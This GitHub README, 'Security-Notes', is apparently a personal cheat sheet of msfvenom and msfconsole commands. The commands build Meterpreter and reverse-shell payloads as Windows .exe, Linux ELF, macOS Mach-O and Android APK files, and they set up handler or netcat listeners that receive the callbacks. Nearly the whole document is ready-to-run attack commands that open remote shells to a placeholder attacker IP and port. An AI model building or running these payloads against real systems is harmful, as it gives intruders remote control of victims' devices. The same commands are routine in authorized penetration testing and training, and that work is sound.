Skip to content

0xj4f/Security-Notes

Repository files navigation

Security Notes

Documenting my journey in the world of CyberSecurity

Reverse Conneciton

Meterpreter

Windows

MSFVenom Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f exe > payload.exe

MSFConsole Listener

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST <Your_IP>; set LPORT <Your_Port>; exploit"

Linux

MSFVenom Payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f elf > payload.elf

MSFConsole Listener

msfconsole -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST <Your_IP>; set LPORT <Your_Port>; exploit"

MACOS

MSFVenom Payload

msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f macho > payload.macho

MSFConsole Listener

msfconsole -x "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set LHOST <Your_IP>; set LPORT <Your_Port>; exploit"

Android

MSFVenom Payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -o payload.apk

MSFConsole Listener

msfconsole -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST <Your_IP>; set LPORT <Your_Port>; exploit"

Netcat

Windows

MSFVenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f exe > payload.exe

Netcat Listener

nc -lvp <Your_Port>

Linux

MSFVenom Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f elf > payload.elf

Netcat Listener

nc -lvp <Your_Port>

Replace <Your_IP> with your IP address and <Your_Port> with the desired port number for the reverse connection.

About

Documenting my journey in the world of CyberSecurity

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published